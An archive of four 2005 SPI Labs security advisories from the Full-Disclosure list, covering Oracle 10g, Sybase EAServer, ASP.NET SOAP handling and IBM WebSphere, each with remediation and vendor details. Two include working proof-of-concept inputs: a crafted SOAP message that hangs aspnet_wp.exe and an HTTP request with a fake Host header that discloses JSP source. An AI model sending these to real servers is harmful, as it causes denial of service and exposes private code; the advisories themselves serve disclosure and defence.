[Full-disclosure] Oracle 10g - emagent.exe Stack-Based Overflow

2005-10-20 Thread SPI Labs
Oracle 10g - emagent.exe Stack-Based Overflow
http://www.spidynamics.com/spilabs/advisories/oracle-emagentoverflow.htm
l

Release Date: October 18, 2005
Severity: Critical

Systems Affected

For a complete list of products and components affected, please visit
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html

Description
---
A vulnerability has been discovered in Oracle Application Server 10g
(10.1.2) on Windows 2000 Server
and others (see list above).  If exploited, this can result in
user-specified code being executed under
the security context of the Oracleoracleas1ASControl service - \\NT
Authority\SYSTEM by default.


Remediation
---
The issue can be resolved by applying the patches provided by October
2005 Oracle Critical Patch Update
available from
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html.


Vendor Information
--
Oracle was contacted on March 7, 2005. For more information about this
advisory please visit Oracle
Critical Patch Update page
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html.


Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700



SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2

2005-07-16 Thread SPI Labs
Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2
---

Release Date: July 15 2005
Severity: Medium

A vulnerability has been discovered in Sybase EAServer. If exploited,
this can result in
user-specified code being executed under the security context of the
jagsrv.exe process.  To complete this attack, you must be authenticated
to /WebConsole/.
By default, the jagadmin user password is set to blank so getting access
might be trivial.

After authenticating to /WebConsole/ if an attacker sets the value of
the JavaScript
parameter in TreeAction.do to a large value a return address can be 
overwritten due to a stack-based buffer overflow.

For more information about this advisory, please visit our advisory page
located at
http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm

[Remediation]
For a complete list of version affected and patch required, please visit
the complete advisory page 
http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm


Vendor Information:
Sybase was contacted on 05/05/2005. For more information about this
advisory
Please visited Sybase alert page http://www.sybase.com/detail?id=1036742


Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700



SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ASP.NET RCP/Encoded Web service DOS

2005-07-11 Thread SPI Labs
ASP.NET RCP/Encoded Web service DOS
http://www.spidynamics.com/spilabs/advisories/aspRCP.html

Release Date: July 11, 2005
Severity: High

[System Affected]
* IIS Servers exposing ASP.NET Web services that consume arrays in
RCP/Encoded mode
* Applications using System.Xml.Serialization to consume untrusted data
in RCP/Encoded mode

[Description]
We have found that by sending a custom SOAP message to an RCP/Encoded
web method which accepts an array (or any object derived from IList,
like StringCollection or ArrayList), we can cause the aspnet_wp.exe
process to consume 100% of the system resources. More than one request
may be required to create this condition on faster systems.

To replicate the issue, we can send a request to the Test(int[]
someList) web method defined inside the AspCrashWebService project
(refer to AspCrashWebService.zip distributed with this document). A
normal SOAP message to call this method with a single element of 0 would
look like:

?xml version=1.0 encoding=utf-16?
soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soapenc=http://schemas.xmlsoap.org/soap/encoding/;
xmlns:tns=http://tempuri.org/;
xmlns:types=http://tempuri.org/encodedTypes;
xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd=http://www.w3.org/2001/XMLSchema;
  soap:Body
soap:encodingStyle=http://schemas.xmlsoap.org/soap/encoding/;
tns:Test
  someList href=#id1 /
/tns:Test
soapenc:Array id=id1 soapenc:arrayType=xsd:int[1]
  Item0/Item
/soapenc:Array
  /soap:Body
/soap:Envelope

If we change the soapenc:Array definition with the complex type
defined in our demo ASPCrashWebService.Service1 WSDL definition
(ArrayOfInt), we will cause the problem in aspnet_wp.exe.
Our new request would look like:

?xml version=1.0 encoding=utf-16?
soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soapenc=http://schemas.xmlsoap.org/soap/encoding/;
xmlns:tns=http://tempuri.org/;
xmlns:types=http://tempuri.org/encodedTypes;
xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd=http://www.w3.org/2001/XMLSchema;
  soap:Body
soap:encodingStyle=http://schemas.xmlsoap.org/soap/encoding/;
tns:Test
  someList href=#id1 /
/tns:Test
tns:ArrayOfInt
  Item0/Item
/tns:ArrayOfint
  /soap:Body
/soap:Envelope

We have found that the error is caused by an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElemen
ts (). The method can be translated to the following code:

protected void ReadReferencedElements()
{
string V_0;

r.MoveToContent();
while (r.NodeType != XmlNodeType.EndElement  r.NodeType !=
XmlNodeType.None)
{
ReadReferencingElement(null, null, true, out V_0);
r.MoveToContent();
}
DoFixups();
HandleUnreferencedObjects();
}

The problem is that after the call to ReadRefencingElement() the
r.NodeType is set to XmlNodeType.Element and the while loop never
terminates.

[Remediation]
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming Whidbey release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation
will resume without problems.

[Credit]
Discovery: Bryan Sullivan
Research: Sacha Faust

Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700



SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] IBM WebSphere Widespread configuration JSP disclosure

2005-04-13 Thread SPI Labs
IBM WebSphere Widespread configuration JSP disclosure

Release Date:   04/13/2005
Severity:   High

[Systems Affected]
*   IBM WebSphere Application 6 and prior.

[Description]

The practice of sharing the document root of the app server within the
document
root of the web server creates a security exposure that can result in
the jsp source being served up as plain text by the web server. The
plug-in has a set of rules used to determine whether a given request
will be handled by the app server. When an incoming request fails to
match those rules, the plug-in returns control to the web server so that
the web server can fulfill the request. In this case, the unknown host
header causes the plug-in to return control to the web server because
the rules don't indicate the app server should handle it. Therefore, the
web server looks for the request in the web server document root. Since
the jsp source is stored in the document root of the web server the web
server finds the file and serves it as plain text. The following is a
demonstration on how to replicate the issue.

HTTP request sent
-

GET /index.jsp  HTTP/1.0
Host: NonExistentHost


HTTP response received
--

HTTP/1.1 200 OK
Via: HTTP/1.1 websphereserver (IBM-PROXY)
Date: Wed, 09 Mar 2005 21:39:43 GMT
Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix)
Last-Modified: Tue, 01 Mar 2005 18:35:02 GMT
ETag: 515e0007-1d72-4224b5d6
Accept-Ranges: bytes
Content-Length: 7538
Content-Type: text/plain

%@ include file=/main/inc/alt-header-0.inc %
%@ include file=includes/tabincv4.jsp %
%@ include file=includes/tactic.jsp %
%=headerjs%
jsp:include page=%=tabhdrinc % flush=true/


[Remediation]

To eliminate this exposure, you should move the app server jsp source
outside of the web server document root. Then, when this request comes
in with the unknown host header the plug-in will return control to the
web server and the web server will fail to find the file in the document
root. Therefore, the web server will return 404 File Not Found rather
than the jsp source.

[Vendor Information]
The vendor was contacted repeatedly without any conclusive results.



Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700



SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/